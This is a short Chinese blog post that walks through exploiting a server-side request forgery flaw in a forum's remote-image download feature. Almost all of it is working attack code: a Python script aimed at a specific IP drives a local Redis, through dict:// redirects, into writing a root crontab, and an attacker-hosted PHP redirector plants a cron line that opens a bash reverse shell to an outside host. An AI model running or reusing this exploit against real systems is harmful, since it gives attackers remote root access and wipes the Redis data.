手记

ssrf漏洞利用

先是写入任务计划反弹shell的脚本

#!/usr/bin/env python
# coding=utf-8
import requests
host = '127.0.0.1'
port = '6379'
bhost = '133.130.100.69'
bport = '38'
vul_httpurl = 'http://150.95.128.111/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]'
_location = 'http://133.130.100.69/exp.php'
shell_location = 'http://133.130.100.69/shell.php'
#1 flush db
_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#2 set crontab command
_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(
host = host,
port = port,
bhost = bhost,
bport = bport)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#3 config set dir /var/spool/cron/
_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#4 config set dbfilename root
_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#5 save to file
_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
exp.php见上篇文章,shell.php代码
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\
\x0a\\x0a\"");
?>



作者:CanMeng
链接:https://www.jianshu.com/p/a59a4adbcf4d

0人推荐
随时随地看视频
慕课网APP